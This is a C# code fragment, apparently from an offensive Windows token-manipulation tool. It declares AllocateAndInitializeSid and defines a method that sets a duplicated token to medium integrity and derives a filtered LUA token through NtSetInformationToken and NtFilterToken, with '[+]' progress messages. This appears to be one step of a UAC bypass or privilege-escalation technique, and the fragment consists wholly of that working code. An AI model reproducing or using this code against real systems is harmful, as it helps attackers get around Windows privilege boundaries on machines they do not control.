public static extern Boolean AllocateAndInitializeSid( ref Structs.SidIdentifierAuthority pIdentifierAuthority, byte nSubAuthorityCount, Int32 dwSubAuthority0, Int32 dwSubAuthority1, Int32 dwSubAuthority2, Int32 dwSubAuthority3, Int32 dwSubAuthority4, Int32 dwSubAuthority5, Int32 dwSubAuthority6, Int32 dwSubAuthority7, out IntPtr pSid );
//////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// public void SetTokenInformation() { Structs.SidIdentifierAuthority pIdentifierAuthority = new Structs.SidIdentifierAuthority(); pIdentifierAuthority.Value = new byte[] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x10 }; byte nSubAuthorityCount = 1; IntPtr pSID = new IntPtr(); if (advapi32.AllocateAndInitializeSid(ref pIdentifierAuthority, nSubAuthorityCount, 0x2000, 0, 0, 0, 0, 0, 0, 0, out pSID)) { Console.WriteLine(" [+] Initialized SID : " + pSID.ToInt32()); } Structs.SID_AND_ATTRIBUTES sidAndAttributes = new Structs.SID_AND_ATTRIBUTES(); sidAndAttributes.Sid = pSID; sidAndAttributes.Attributes = Constants.SE_GROUP_INTEGRITY_32; Structs.TOKEN_MANDATORY_LABEL tokenMandatoryLabel = new Structs.TOKEN_MANDATORY_LABEL(); tokenMandatoryLabel.Label = sidAndAttributes; Int32 tokenMandatoryLableSize = Marshal.SizeOf(tokenMandatoryLabel); if (ntdll.NtSetInformationToken(phNewToken, 25, ref tokenMandatoryLabel, tokenMandatoryLableSize) == 0) { Console.WriteLine(" [+] Set Token Information : " + phNewToken.ToInt32()); } else { GetError("NtSetInformationToken: "); } IntPtr luaToken = new IntPtr(); if (ntdll.NtFilterToken(phNewToken, 4, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref luaToken) == 0) { Console.WriteLine(" [+] Set LUA Token Information : " + luaToken.ToInt32()); } else { GetError("NtFilterToken: "); } }